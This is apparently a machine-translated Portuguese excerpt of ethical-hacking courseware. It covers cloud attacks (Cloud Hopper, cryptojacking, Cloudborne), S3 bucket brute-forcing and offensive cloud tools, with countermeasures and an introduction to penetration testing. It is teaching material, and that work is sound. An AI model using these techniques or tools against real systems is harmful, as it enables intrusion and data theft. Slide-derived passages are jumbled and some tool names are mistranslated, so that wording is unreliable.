invasores também podem usar scripts baseados em comandos PowerShell e PowerSploit para reconhecimento
e coleta de informações. Os invasores usam as informações coletadas para acessar outros sistemas conectados
à mesma rede. Para realizar esse ataque, os invasores também utilizam o C&C para sites que falsificam domínios
legítimos e malware sem arquivo que reside e é executado a partir da memória.
Os invasores violam os mecanismos de segurança representando um provedor de serviços válido e obtêm
acesso completo aos dados corporativos da empresa e dos clientes conectados.
Conforme mostrado na figura, um invasor se infiltra no provedor MSP de destino e distribui malware para obter
acesso remoto. O invasor então acessa os perfis do cliente-alvo com sua conta MSP, compacta os dados do
cliente e os armazena no MSP. O invasor então extrai as informações do MSP e usa essas informações para
lançar novos ataques à organização e aos usuários de destino.

Figura 11.27: Demonstração do ataque Cloud Hopper

Ataques na nuvem: criptojacking na nuvem

ÿ Cryptojacking é o uso não autorizado do computador da vítima para minerar moeda digital furtivamente
ÿ Os ataques de criptojacking são altamente lucrativos, envolvendo tanto invasores externos quanto membros desonestos
ÿ Para realizar esse ataque, os invasores utilizam vetores de ataque como configurações incorretas de nuvem, sites comprometidos,
e vulnerabilidades do lado do cliente ou do servidor
Serviço de nuvem incorporado

com script de criptomineração
A vítima se conecta ao Atacante comprometendo

serviço de nuvem comprometido o serviço de nuvem
Atacante
Vítima
A vítima começa a minerar Atacante ganha recompensa

a criptomoeda em moedas de criptomoeda
Mineração de criptomoeda
Criptojacking na nuvem
Cryptojacking é o uso não autorizado do computador da vítima para minerar moeda digital furtivamente. Os ataques de
criptojacking são altamente lucrativos, envolvendo tanto invasores externos quanto internos desonestos internos. Para realizar
esse ataque, os invasores utilizam vetores de ataque, como configurações incorretas da nuvem, sites comprometidos e
vulnerabilidades do lado do cliente ou do servidor.
Por exemplo, um invasor explora instâncias de nuvem mal configuradas para injetar carga maliciosa de mineração de
criptografia em uma página da Web ou biblioteca de terceiros carregada pela página da Web. Em seguida, o invasor atrai a
vítima para visitar a página da Web maliciosa e, quando a vítima abre a página da Web, executa automaticamente o
criptominerador no navegador da vítima usando JavaScript. Usando mineradores criptográficos baseados em JavaScript,
como CoinHive e Cryptoloot, os invasores podem incorporar facilmente scripts maliciosos de mineração criptográfica em sites
legítimos usando um link para o CoinHive. Os invasores tornam esse ataque mais complexo ocultando o script malicioso de
mineração de criptografia usando várias técnicas de ocultação, como codificação, redirecionamentos e ofuscação. A
configuração da carga geralmente é dinâmica ou codificada. Os ataques de cryptojacking podem causar um impacto severo
em sites, endpoints e até mesmo em toda a infraestrutura de nuvem.
Etapas dos ataques de cryptojacking na nuvem:
ÿ Etapa 1: um invasor compromete o serviço de nuvem incorporando uma criptografia maliciosa

roteiro mineiro.
ÿ Passo 2: Quando a vítima se conecta ao serviço de nuvem comprometido, o cripto-mineração

script é executado automaticamente.
ÿ Etapa 3: A vítima ingenuamente começa a minerar a criptomoeda em nome do invasor e

adiciona um novo bloco ao blockchain.

ÿ Etapa 4: Para cada novo bloco adicionado ao blockchain, o invasor recebe uma recompensa no
forma de moedas de criptomoeda ilicitamente.
Figura 11.28: Demonstração do ataque de cryptojacking

Ataques na Nuvem: Ataque na Nuvem
ÿ Cloudborne é uma vulnerabilidade que reside em um servidor de nuvem bare-metal que permite que os
invasores implantem um backdoor malicioso em seu firmware
ÿ O backdoor malicioso pode permitir que os invasores contornem os mecanismos de segurança e

executem várias atividades, como observar a atividade ou comportamento do novo usuário, desabilitar o
aplicativo ou servidor e interceptar ou roubar os dados
Atacante injeta backdoor Servidor atribuído a novo

malicioso em servidor bare-metal cliente com backdoor persistente
O invasor exfiltra os dados do Atacante monitora cliente

cliente por meio de backdoor persistente Atividades
Atacante Novo cliente
Ataque Cloudborne
Cloudborne é uma vulnerabilidade que reside em um servidor de nuvem bare-metal que permite que invasores
implantem um backdoor malicioso em seu firmware. O backdoor instalado pode persistir mesmo se o servidor for
realocado para novos clientes ou empresas que o utilizam como IaaS. Os servidores físicos não estão confinados a
um cliente e podem ser movidos de um cliente para outro. Durante o processo de recuperação, se o re-flash do
firmware (configuração padrão de fábrica, apagamento completo da memória etc.)
servidor.
Os invasores exploram vulnerabilidades no hardware supermicro para sobrescrever o firmware no controle de

gerenciamento da placa base (BMC) de um servidor bare-metal usado para atividades de gerenciamento remoto,
como provisionamento, reinstalação do sistema operacional e solução de problemas por meio do gerenciamento
inteligente da plataforma interface (IPMI) sem acesso físico. Como o BMC tem o poder de controlar os servidores
remotamente e provisionar o sistema para os novos clientes, os invasores o escolhem como alvo principal.
Vulnerabilidades no servidor de nuvem bare-metal e atualização inadequada de firmware podem abrir caminho para
que invasores instalem e mantenham a persistência de backdoor. Em seguida, os backdoors maliciosos permitem que
os invasores acessem diretamente o hardware e contornem os mecanismos de segurança para realizar atividades
como monitorar as atividades de novos clientes, desabilitar o aplicativo/servidor e interceptar os dados. Essas
atividades permitem que os invasores lancem ataques de ransomware no alvo.
Figura 11.29: Ilustração de ataque na nuvem

Enumerando baldes S3 usando lazys3
preguiçosos3
O serviço de armazenamento simples ÿ lazys3 é uma ferramenta de script Ruby usada para força bruta de baldes AWS S3
(S3) é um serviço de armazenamento usando diferentes permutações
em nuvem escalável usado pela Amazon
AWS onde arquivos, pastas e
objetos são armazenados por meio
de APIs da web
Os invasores geralmente tentam

encontrar a localização do balde
e nome para testar seu
segurança e identificar
vulnerabilidades no balde
implementação
https:// github.com
Enumerando baldes S3 usando lazys3
O serviço de armazenamento simples (S3) é um serviço de armazenamento em nuvem escalável usado pela Amazon AWS,
onde arquivos, pastas e objetos são armazenados por meio de APIs da web. Clientes e usuários finais usam os serviços S3
para armazenar documentos de texto, PDFs, vídeos, imagens etc. Para armazenar todos esses dados, o usuário precisa criar
um depósito com um nome exclusivo.
Os invasores podem explorar configurações incorretas na implementação do bucket e violar o mecanismo de segurança para
comprometer a privacidade dos dados. Deixar a sessão do bucket do S3 em execução permite que os invasores modifiquem
arquivos (em JavaScript ou códigos relacionados) e injetem malware nos arquivos do bucket. Os invasores geralmente tentam
encontrar a localização e o nome do bucket para testar sua segurança e identificar vulnerabilidades na implementação do
bucket.
ÿ preguiça3
lazys3 é uma ferramenta de script Ruby usada para força bruta de baldes AWS S3 usando diferentes permutações.
Essa ferramenta obtém os buckets S3 publicamente acessíveis e também permite pesquisar os buckets S3 de uma
empresa específica inserindo o nome da empresa.

Figura 11.30: Captura de tela de lazys3

Ferramentas de ataque em nuvem
ÿ Uma ferramenta usada para impressão digital e exploração de infraestruturas de nuvem

Nebuloso da Amazon ÿ Permite que os invasores enumerem o acesso aos serviços da AWS para a função IAM atual,
extrair as credenciais atuais da AWS dos metadados, etc.
S3Scanner
https:// github.com
Ferramenta de ataque de
contêiner em nuvem (CCAT)

https:// github.com
Pacu
https:// github.com
DumpsterDiver
https:// github.com
GCPBucketBrute
https:// rhinosecuritylabs.com
https:// andresriancho.github.io
Ferramentas de ataque em nuvem
Listadas abaixo estão várias ferramentas de ataque à nuvem:
ÿ Nublado
Fonte: https:// andresriancho.github.io
Nimbostratus é uma ferramenta usada para impressão digital e exploração de infraestruturas de nuvem da
Amazon.
Ele permite que os invasores
o Enumerar o acesso aos serviços da AWS para a função IAM atual.
o Use uma função do IAM mal configurada para criar um novo usuário da AWS.
o Extrair credenciais atuais da AWS de metadados, arquivos .boto.cfg, ambiente

variáveis, etc
o Clone DBs para acessar informações armazenadas em snapshot, etc.

Figura 11.31: captura de tela do Nimbostratus
As ferramentas adicionais de ataque à nuvem incluem o seguinte:
ÿ S3Scanner (https:// github.com)

ÿ Cloud Container Attack Tool (CCAT) (https:// github.com)
ÿ Pacu (https:// github.com)
ÿ DumpsterDiver (https:// github.com)
ÿ GCPBucketBrute (https:// rhinosecuritylabs.com)

Fluxo do módulo

01 02 Tecnologia

Contramedidas
04 03
Discutir contramedidas de ataque na nuvem
Existem vários riscos e ameaças associados à adoção de serviços em nuvem e à migração de dados
críticos de negócios para sistemas de terceiros. No entanto, seguir as diretrizes e contramedidas de
segurança fortalece o caso de negócios para a adoção da nuvem. Esta seção discute várias
contramedidas de ataque na nuvem e ferramentas de segurança na nuvem.

Contramedidas de ataque em nuvem
Aplicar mecanismos de proteção, backup e Proibir o compartilhamento de credenciais

1 retenção de dados de usuário entre usuários, aplicativos e serviços
4
Aplicar SLAs para aplicação de patches e correção de Implemente controles fortes de autenticação,
2 vulnerabilidades autorização e auditoria
5
Os fornecedores devem passar regularmente pelo AICPA Implemente práticas fortes de geração, armazenamento,
3 Auditorias SAS 70 Tipo II gerenciamento e destruição de chaves
6
Contramedidas de Ataque em Nuvem (continuação)
7 8 9
Certifique-se de que a Garanta que a segurança Aplicar padrões de
nuvem seja submetida física seja um assunto 24 x 7 segurança na
a verificações e x 365 instalação/configuração

atualizações regulares de segurança
10 11 12
Certifique-se de que o Implemente uma Analise os
memória, armazenamento notificação de violação módulos de software da
e acesso à rede de segurança de linha de base cadeia de dependência da API
está isolado processar

Ataque de Canal Lateral Ataque envolvente Ataque MITC
Implemente um firewall virtual no Use a validação do esquema XML Use um gateway de segurança
back- end do servidor em nuvem da para detectar mensagens SOAP de e-mail para detectar os ataques de
computação em nuvem engenharia social
Implementar criptografia e Aplicar criptografia Endureça as políticas de

descriptografia aleatória autenticada na especificação expiração de token
de criptografia XML
Bloqueie imagens do sistema

Implemente o agente de
operacional e instâncias de
segurança de acesso à nuvem
aplicativos para evitar vetores (CASB) para monitorar o tráfego na nuvem
comprometedores que possam fornecer
Acesso
Ataque Cloud Hopper Criptojacking na nuvem Ataque Cloudborne
Implemente a autenticação Certifique-se de implementar Os CSPs devem manter

multifator para evitar o uma política de senha forte o firmware atualizado
comprometimento de credenciais
Assegurar a coordenação mútua Sempre preserve três Higienize o firmware do servidor

entre clientes e cópias diferentes dos dados antes de ser atribuído a novos
CSPs em caso de incidentes em locais diferentes e uma clientes
ou atividades anormais cópia fora do local
Certifique-se de que os clientes estejam Implemente CoinBlocker URL e

cientes e sigam as políticas de serviço IP Blacklist/blackholing no firewall
em nuvem
Contramedidas de ataque em nuvem
A seguir, são discutidas várias contramedidas para proteger um ambiente de nuvem:
ÿ Aplicar proteção de dados, backup e mecanismos de retenção.
ÿ Aplicar SLAs para aplicação de patches e correção de vulnerabilidades.
ÿ Os fornecedores devem passar regularmente por auditorias AICPA SAS 70 Tipo II.

ÿ Verifique sua nuvem em listas negras de domínio público.
ÿ Aplicar contratos legais na política de comportamento dos funcionários.
ÿ Proibir o compartilhamento de credenciais de usuário entre usuários, aplicativos e serviços.
ÿ Implementar controles seguros de autenticação, autorização e auditoria.
ÿ Verifique a proteção de dados no design e no tempo de execução.
ÿ Implementar fortes práticas de geração, armazenamento, gerenciamento e destruição de chaves.
ÿ Monitore o tráfego do cliente em busca de atividades maliciosas.
ÿ Impeça o acesso não autorizado ao servidor usando pontos de verificação de segurança.
ÿ Divulgar logs e dados aplicáveis aos clientes.
ÿ Analisar as políticas de segurança e SLAs do provedor de nuvem.
ÿ Avalie a segurança das APIs de nuvem e registre o tráfego de rede do cliente.
ÿ Certifique-se de que a nuvem seja submetida a verificações e atualizações de segurança regulares.
ÿ Certifique-se de que a segurança física seja um assunto 24 x 7 x 365.
ÿ Aplicar padrões de segurança na instalação/configuração.
ÿ Certifique-se de que a memória, o armazenamento e o acesso à rede estejam isolados.
ÿ Aproveite as fortes técnicas de autenticação de dois fatores, sempre que possível.
ÿ Aplicar um processo básico de notificação de violação de segurança.
ÿ Analisar os módulos de software da cadeia de dependência da API.
ÿ Aplicar processos rigorosos de registro e validação.
ÿ Executar avaliação de vulnerabilidade e risco de configuração.
ÿ Divulgar informações de infraestrutura, patches de segurança e detalhes de firewall para os clientes.
ÿ Empregar dispositivos de segurança, como IDS, IPS e firewall, para proteger e impedir o acesso não autorizado aos dados
armazenados na nuvem.
ÿ Aplicar uma gestão estrita da cadeia de suprimentos e realizar uma avaliação abrangente do fornecedor
avaliação.
ÿ Aplicar políticas e procedimentos de segurança rigorosos, como política de controle de acesso, informações
política de gerenciamento de segurança e política contratual.
Contramedidas de ataque de canal lateral
ÿ Implementar um firewall virtual no back-end do servidor de nuvem da computação em nuvem; isto

impede que o invasor coloque VMs maliciosas.
ÿ Implementar criptografia e descriptografia aleatória (criptografa dados usando RSA, 3DES, AES
algoritmos).

ÿ Bloqueie imagens do sistema operacional e instâncias de aplicativos para evitar vetores comprometedores que
pode fornecer acesso.
ÿ Verifique se há tentativas repetidas de acesso à memória local e a quaisquer processos de hypervisor ou cache de
hardware compartilhado ajustando e coletando dados e logs de monitoramento de processos locais para sistemas em
nuvem.
ÿ Codifique os aplicativos e componentes do sistema operacional para que eles acessem recursos compartilhados, como
cache de memória, de maneira consistente e previsível. Esse estilo de codificação impede que invasores coletem
informações confidenciais, como estatísticas de tempo e outros atributos comportamentais.
Contramedidas de ataque envolvente
ÿ Use validação de esquema XML para detectar mensagens SOAP.
ÿ Aplicar criptografia autenticada na especificação de criptografia XML.
Contramedidas de Ataque MITC
ÿ Use um gateway de segurança de e-mail para detectar os ataques de engenharia social que podem levar a
MITCs.
ÿ Endurecer as políticas de expiração de token pode prevenir esse tipo de ataque.
ÿ Use um software antivírus eficiente que possa detectar e excluir malware.
ÿ Implementar agente de segurança de acesso à nuvem (CASB) para monitorar o tráfego da nuvem para detecção de
anomalias com as instâncias geradas.
ÿ Monitore as atividades dos funcionários para detectar quaisquer sinais significativos de sincronização na nuvem
abusos de token.
ÿ Criptografe os dados armazenados na nuvem e garanta que as chaves de criptografia não sejam armazenadas dentro
o mesmo serviço de nuvem.
ÿ Implementar a autenticação de dois fatores.
Contramedidas de ataque do Cloud Hopper
ÿ Implemente a autenticação multifator para evitar o comprometimento de credenciais.
ÿ Assegurar a coordenação mútua entre clientes e CSPs em caso de incidentes anormais

ou atividades.
ÿ Certifique-se de que os clientes estejam cientes e sigam as políticas de serviço em nuvem.
Contramedidas do Cloud Cryptojacking
ÿ Certifique-se de implementar uma política de senha forte.
ÿ Sempre preserve três cópias diferentes dos dados em lugares diferentes e uma cópia
local.
ÿ Certifique-se de corrigir os servidores web e dispositivos regularmente.
ÿ Use pares de chaves SSH criptografados em vez de senhas para proteger o acesso a servidores em nuvem.

ÿ Implementar CoinBlocker URL e IP Blacklist/blackholing no firewall.
ÿ Empregar monitoramento em tempo real do modelo de objeto de documento da página da Web (DOM) e
ambientes JavaScript para detectar e mitigar atividades maliciosas em um estágio inicial.
ÿ Use as ferramentas antivírus, antimalware e adblocker mais recentes na nuvem.
ÿ Implementar extensões de navegador para escanear e encerrar scripts semelhantes ao

Script mineiro da CoinHive.
ÿ Use a tecnologia de gerenciamento de segurança de endpoint para detectar qualquer aplicativo não autorizado no
dispositivos.
ÿ Revise todos os componentes de terceiros usados pelos sites da empresa.
Contramedidas de Ataque Cloudborne
ÿ Os CSPs devem manter o firmware atualizado.
ÿ Higienize o firmware do servidor antes de atribuí-lo a novos clientes.

Ferramentas de segurança na nuvem
Uma solução de segurança de TI de ponta a ponta que fornece uma avaliação

Nuvem Qualys
contínua e sempre ativa da postura global de segurança e conformidade, com
Plataforma
visibilidade de todos os ativos de TI, independentemente de onde residam
CloudPassage Halo
https:// www.cloudpassage.com
McAfee MVISION Cloud

https:// www.mcafee.com
CipherCloud
https:// www.ciphercloud.com
Netskope Security Cloud

https:// www.netskope.com
Prisma Cloud
https:// www.paloaltonetworks.com
https:// www.qualys.com
Ferramentas de segurança na nuvem
Algumas ferramentas para proteger o ambiente de nuvem incluem o seguinte:
ÿ Qualys Cloud Platform
Fonte: https:// www.qualys.com
Qualys Cloud Platform é uma solução de segurança de TI de ponta a ponta que fornece uma avaliação
contínua e sempre ativa da postura global de segurança e conformidade, com visibilidade de todos os
ativos de TI, independentemente de onde residam. Inclui sensores que fornecem visibilidade contínua e
todos os dados da nuvem podem ser analisados em tempo real. Ele responde a ameaças imediatamente,
executa a vulnerabilidade ativa na solicitação de registro de data e hora do protocolo de mensagens de
controle da Internet e visualiza os resultados em um só lugar com o AssetView.

Figura 11.32: Captura de tela da Qualys Cloud Platform
As ferramentas adicionais de segurança na nuvem incluem o seguinte:
ÿ CloudPassage Halo (https:// www.cloudpassage.com)

ÿ McAfee MVISION Cloud (https:// www.mcafee.com)
ÿ CipherCloud (https:// www.ciphercloud.com)
ÿ Netskope Security Cloud (https:// www.netskope.com)
ÿ Prisma Cloud (https:// www.paloaltonetworks.com)

Resumo do Módulo
Além disso, revisamos as várias
Neste módulo, apresentamos os
contramedidas a serem
conceitos de computação em
1 nuvem e vários tipos de serviços
4 empregado para proteger o ambiente de
nuvem de tentativas de hackers por agentes de
de computação em nuvem
ameaças
Também discutimos o Por fim, encerramos este módulo com
2 importância da tecnologia de 5 uma discussão detalhada sobre várias
contêineres ferramentas de segurança na nuvem

Examinamos completamente as
3 ameaças e ataques de computação em nuvem
6 em detalhes os conceitos de teste de
penetração
Resumo do Módulo
Neste módulo, apresentamos os conceitos de computação em nuvem e os vários tipos de serviços de
computação em nuvem. Ele também discutiu a importância da tecnologia de contêineres e examinou
completamente as ameaças e ataques de computação em nuvem. Além disso, revisou as várias
contramedidas a serem empregadas para proteger o ambiente de nuvem contra tentativas de hackers por
agentes de ameaças. Por fim, o módulo terminou com uma discussão detalhada sobre várias ferramentas
de segurança na nuvem.
No próximo módulo, discutiremos em detalhes os vários conceitos de teste de penetração.
MT
EC-Council
CE-Conselho
E
Ethical
HE
Hacking Essentials
Módulo 12
Fundamentos do t es t e d e p en etra ção

Fundamentos de testes de penetração
1 Compreendendo o teste de penetração e seus benefícios
2 Compreendendo os tipos de teste de penetração
3 Entendendo as fases do teste de penetração
4 Visão geral das metodologias de teste de penetração
Visão geral das diretrizes e recomendações

5 para teste de penetração
Entendendo os riscos associados à penetração

6 teste
Com o aumento drástico de ataques cibernéticos, é importante que as organizações realizem testes de
penetração regulares para revelar vulnerabilidades e pontos fracos ocultos em sua infraestrutura de TI e
garantir a eficácia dos atuais controles de segurança cibernética. O teste de penetração ajuda as organizações
a desenvolver e implementar medidas de segurança proativas antecipadamente e a impedir a evolução das
ameaças.
Este módulo discute a importância do teste de penetração em uma organização e explica o papel crucial que
um testador desempenha na identificação de vulnerabilidades. Abrange vários conceitos fundamentais sobre
testes de penetração, incluindo sua importância, tipos, fases, metodologias e processos. Ele também discute
a ética de um testador de penetração, habilidades necessárias e responsabilidades.
ÿ Compreender os testes de penetração e seus benefícios
ÿ Compreender os tipos e fases dos testes de penetração
ÿ Explicar as metodologias de teste de penetração
ÿ Compreender várias diretrizes e recomendações para testes de penetração
ÿ Descrever vários riscos associados ao teste de penetração

Fluxo do módulo
01 Entenda os Fundamentos
de Testes de Penetração e
seus Benefícios
02 Discutir estratégias e fases do

teste de penetração
03 Diretrizes e recomendações para

testes de penetração
Entenda os fundamentos do teste de penetração e seus benefícios

Esta seção apresenta o teste de penetração e discute vários conceitos relacionados a ele,
incluindo os tipos, fases e metodologias de teste.

O que é
Teste de
Penetração ?
O teste de penetração é um tipo de É uma maneira eficaz de Envolve a avaliação ativa

1 teste de segurança que avalia a
2 determinar a eficácia das
3 da segurança da infraestrutura
capacidade de uma organização de políticas, controles e tecnologias da organização, simulando um
proteger sua infraestrutura, como rede, de segurança da organização ataque semelhante aos
aplicativos, sistemas e usuários contra executados por atacantes reais
ameaças externas e internas .
ameaças
O que é Teste de Penetração?
O teste de penetração, também chamado de teste de penetração, vai um passo à frente da verificação de
vulnerabilidade na avaliação de segurança. Ao contrário da varredura de vulnerabilidade, que examina a segurança
de computadores individuais, dispositivos de rede ou aplicativos, o teste de penetração avalia o modelo de
segurança da rede como um todo. O teste de penetração pode revelar as possíveis consequências de um invasor
real invadindo as contas de administradores de rede a rede, gerentes de TI e executivos. Ele também esclarece os
pontos fracos de segurança perdidos na varredura de vulnerabilidade típica.
O teste de penetração é um tipo de teste de segurança que avalia a capacidade de uma organização de proteger
sua infraestrutura, como rede, aplicativos, sistemas e usuários de ameaças externas e internas. É uma maneira
eficaz de determinar a eficácia das políticas, controles e tecnologias de segurança da organização. Envolve a
avaliação ativa da segurança da infraestrutura da organização, simulando um ataque semelhante aos executados
por atacantes reais.
Durante um teste de penetração, as medidas de segurança são analisadas ativamente quanto a pontos fracos de
design, falhas técnicas e vulnerabilidades. Os resultados do teste são documentados e entregues em um relatório
abrangente para a gerência executiva e audiências técnicas.

Benefícios da realização de um teste de penetração
1 Revelar vulnerabilidades
2 Mostrar riscos reais
3 Garanta a continuidade dos negócios
4 Reduzindo os ataques do cliente final
Estabelecer o status da empresa em termos

5 de segurança
6 Cuide da reputação da empresa
Benefícios da realização de um teste de penetração
A seguir estão alguns dos benefícios da realização de um teste de penetração:
ÿ Revelar vulnerabilidades: Além de revelar os pontos fracos existentes em um sistema ou configurações de aplicativos, um
teste de penetração investiga a ação e o comportamento da equipe de uma organização que pode levar a uma violação
de dados. Por fim, o testador fornece um relatório contendo atualizações sobre vulnerabilidades de segurança, bem como
recomendações e políticas para melhorar a segurança geral.
ÿ Mostrar riscos reais: O testador explora as vulnerabilidades identificadas para verificar como um
atacante poderia se comportar.
ÿ Garanta a continuidade dos negócios: Uma pequena interrupção pode ter um grande impacto em um negócio.
Pode custar à empresa dezenas a milhares de dólares. Portanto, a disponibilidade da rede, o acesso aos recursos e as
comunicações 24 horas por dia, 7 dias por semana, são necessários para executar a operação comercial. Um teste de
penetração revela ameaças potenciais e recomenda soluções para garantir que a operação comercial não seja afetada
por um tempo de inatividade inesperado ou perda de acessibilidade.
ÿ Redução de ataques do lado do cliente: um invasor pode invadir os sistemas de uma organização pelo lado do cliente,
especialmente por meio de serviços de formulários on-line e da Web. As empresas devem estar preparadas para proteger
seus sistemas de tais ataques. Se uma organização sabe que tipo de ataques podem ser esperados, ela conhece os
sinais a serem observados e deve ser capaz de atualizar o aplicativo.
ÿ Estabelecer o status da empresa em termos de segurança: Os testes de penetração fornecem conhecimento do nível de
segurança de uma empresa e seu status em termos de segurança. O testador fornece um relatório sobre o sistema geral
de segurança da empresa e as áreas que precisam

melhorias, e o relatório inclui detalhes sobre a proteção da proteção de sua infraestrutura e eficácia das
medidas de segurança existentes.
ÿ Zelar pela reputação da empresa: É importante para uma empresa manter uma boa reputação com seus
parceiros e clientes. Ganhar a confiança e o apoio até mesmo de parceiros leais é difícil se a empresa for
afetada por uma violação ou ataque de dados. As organizações devem realizar regularmente testes de
penetração para proteger seus dados e a confiança de seus parceiros e clientes.

Comparando auditoria de segurança, avaliação de

vulnerabilidade e teste de penetração
Vulnerabilidade
Auditoria de segurança Teste de penetração
Avaliação
ÿ Uma auditoria de segurança ÿ Uma avaliação de vulnerabilidade se ÿ O teste de penetração é um

verifica se uma organização concentra na descoberta de abordagem metodológica para
segue um conjunto de padrões vulnerabilidades em um sistema avaliação de segurança que engloba
políticas e procedimentos de informação, mas não fornece uma auditoria de segurança e
de segurança nenhuma indicação se as avaliação de vulnerabilidade , e
vulnerabilidades podem ser demonstra se as vulnerabilidades em
exploradas ou da quantidade de um sistema podem ser exploradas
dano que pode resultar do sucesso com sucesso por invasores

Segurança
auditoria
exploração das
vulnerabilidades
Comparando auditoria de segurança, avaliação de vulnerabilidade e teste de penetração
ÿ Auditoria de segurança: Uma auditoria de segurança é usada para avaliar se a segurança das informações
de uma empresa atende a um conjunto de critérios estabelecidos e para garantir que a empresa esteja em
conformidade com seus regulamentos, política de segurança e responsabilidades legais. Diferentes tipos de
auditoria são usados para avaliar os processos de segurança de uma empresa. Uma auditoria de segurança
verifica apenas se a organização segue um conjunto de políticas e procedimentos de segurança padrão.
ÿ Avaliação de vulnerabilidade: É usada para identificar e medir a gravidade da vulnerabilidade em um sistema;

geralmente, é usado para identificar vulnerabilidades comuns na configuração de um sistema. A avaliação
de vulnerabilidade fornece às organizações uma lista de vulnerabilidades que precisam ser corrigidas, sem
estimar metas ou cenários específicos. A lista é fornecida de acordo com o nível de gravidade da
vulnerabilidade ou criticidade do negócio.
A avaliação de vulnerabilidade é adequada para uma organização que não é segura, deseja começar, tem
uma maturidade de segurança média a alta e deseja manter a postura de segurança de sua rede. Embora
a avaliação de vulnerabilidade se concentre na identificação das vulnerabilidades em um sistema de
informação, ela não fornece nenhuma indicação se as vulnerabilidades podem ser exploradas ou da
quantidade de dano que pode resultar de sua exploração bem-sucedida.
ÿ Teste de penetração: Um teste de penetração é um exercício orientado para um objetivo; ele se concentra
em ataques em tempo real em vez de descobrir uma vulnerabilidade específica. O testador de penetração
atua como um hacker e segue todas as etapas que um hacker real seguiria para violar um sistema. Esse
tipo de teste é adequado para organizações com alto nível de maturidade de segurança. O teste de
penetração é uma abordagem metodológica para avaliação de segurança que abrange uma auditoria de
segurança e avaliação de vulnerabilidade, e demonstra se as vulnerabilidades no

sistema pode ser explorado com sucesso por invasores, bem como a quantidade de dano
que pode resultar da exploração bem-sucedida das vulnerabilidades.

Tipos de Avaliação de Penetração: Orientada a Objetivos vs.

Orientado para a conformidade vs. Orientado para a equipe vermelha
Teste de penetração orientado a objetivos/orientado a objetivos
ÿ Esse tipo de avaliação é orientado por metas. Os objetivos do teste de penetração são definidos, em vez
do que definir o escopo das metas
ÿ O objetivo da avaliação de penetração é definido antes de começar
ÿ O trabalho do pen tester para verificar se ele/ela pode atingir a meta e determinar as diferentes maneiras de atingir a meta
Obtenha acesso remoto a uma rede

Ganhe administrador de domínio
interna
Acesso
Exemplos Obtenha acesso às informações do

Criar uma condição de negação de serviço
cartão de crédito
(DoS) em um site
Desfigurar um site

Orientado para a conformidade vs. Orientado para a equipe vermelha (continuação)
Penetração Orientada à Conformidade

teste
ÿ Este tipo de avaliação é impulsionado por

requisitos de conformidade. Está testando
a adesão aos requisitos de conformidade
ÿ Implica a realização de uma avaliação em relação aos

requisitos de conformidade dos padrões, estruturas, leis,
atos de segurança cibernética, etc.
ÿ Por exemplo, uma organização pode solicitar

realizar uma avaliação de segurança em relação aos
requisitos PCI-DSS


Orientado para a conformidade vs. Orientado para a equipe vermelha (continuação)
Teste de penetração baseado em equipe vermelha
ÿ O teste de penetração baseado em equipe vermelha é uma

avaliação adversária baseada em objetivos em que o
testador de penetração deve imitar o comportamento de um
invasor real e direcionar o ambiente
ÿ Este tipo de avaliação não tem

condutor
ÿ Por exemplo, uma organização pode solicitar

realizar uma avaliação de segurança para
avaliar sua segurança geral. Pode incluir a
avaliação de pessoas, redes, aplicativos, segurança
física, etc.
Tipos de Avaliação de Penetração: Orientada a Objetivos vs. Orientada à Conformidade vs.

Orientado para a equipe vermelha
A avaliação da penetração pode ser realizada usando as seguintes abordagens.
ÿ Abordagem de teste de penetração orientada a objetivos/objetivos: Os objetivos são os direcionadores para esta
abordagem de teste de penetração. Nesse tipo de avaliação, um testador de penetração encarregado de identificar
ou demonstrar um risco tenta atingir uma meta, em vez de encontrar vulnerabilidades. Eles se concentram em
encontrar maneiras diferentes de atingir o objetivo. Na avaliação de penetração orientada a objetivos, o objetivo é
definido antes do início do teste de penetração. Para atingir as metas definidas (objetivo), o pen tester executa
vários processos seriais ou paralelos.
Alguns objetivos comuns em testes de penetração orientados a objetivos/objetivos são os seguintes:
o Obter acesso remoto a uma rede interna
o Obtenha acesso às informações do cartão de crédito
o Obtenha acesso de administrador de domínio
o Criar uma condição de negação de serviço (DoS) contra um site
o Desfigurar um site
ÿ Abordagem de teste de penetração orientada à conformidade: Os requisitos de conformidade são os direcionadores

dessa abordagem. Implica testar a adesão aos requisitos de conformidade.
Envolve a realização de avaliações em relação aos requisitos de conformidade de padrões, estruturas, leis, atos
de segurança cibernética, etc. Por exemplo, uma organização pode solicitar a realização de uma avaliação de
segurança em relação a padrões de conformidade como PCI-DSS, ISO-27001,

FISMA, HIPAA e HITRUST. O teste de penetração orientado à conformidade também revisa as regras de firewall
para conformidade.
A abordagem de teste de penetração orientada à conformidade é uma abordagem proativa para proteger e manter
a conformidade. Isso permite que as organizações façam o seguinte:
o Manter a postura de segurança da organização, identificando e prevenindo ataques antes que eles ocorram
o Aprimorar a infraestrutura de segurança ou estrutura de políticas
o Avaliar o nível de conformidade de uma organização em áreas específicas, como gerenciamento de patches,
política de senha e gerenciamento de configuração
o Proteger os dados do cliente contra violações, o que pode resultar em uma penalidade pesada
o Verificar a segurança do sistema no que diz respeito à certificação e acreditação (C&A)

Atividades
ÿ Abordagem de teste de penetração orientada para red-team: Esta abordagem é uma avaliação baseada em
objetivo contraditório na qual o testador de penetração deve imitar um invasor real e atingir um ambiente. Essa
abordagem não tem um driver específico. Por exemplo, uma organização pode solicitar a realização de uma
avaliação de segurança para avaliar sua segurança geral. Pode incluir a avaliação de pessoas, redes, aplicativos,
segurança física, etc. Além disso, é um tipo ofensivo de teste de segurança em que um time vermelho trabalha
com um time azul e atualiza o time azul com as táticas, técnicas e procedimentos (TTPs) usados pela equipe de
leitura.
Ele permite que as organizações façam o seguinte:
o Entenda sua capacidade de detectar e responder a ataques do mundo real
o Avaliar sua segurança organizacional em relação a metas específicas
o Verifique sua resposta organizacional a um ataque
o Validar elementos de posturas de segurança organizacional
o Identificar os riscos perdidos pela equipe de teste de penetração

Fluxo do módulo
de Testes de Penetração e
seus Benefícios
02 Discutir estratégias e fases do

teste de penetração
03 Diretrizes e recomendações para

testes de penetração
Discutir estratégias e fases do teste de penetração

Esta seção discute as várias estratégias de teste de penetração, processo de teste de penetração,
fases de teste de penetração e metodologias de teste de penetração.

Estratégias de Teste de Penetração
As estratégias de teste de penetração são amplamente classificadas da seguinte forma:
Caixa preta caixa branca caixa cinza
ÿ Cada estratégia de teste adota uma abordagem diferente

para avaliar a segurança da infraestrutura de uma
organização
Estratégias de Teste de Penetração
Os três tipos de teste de penetração são testes de caixa preta, branca e cinza. Cada tipo de teste adota uma
abordagem diferente para avaliar a segurança da infraestrutura de uma organização.
ÿ Testes de caixa-preta
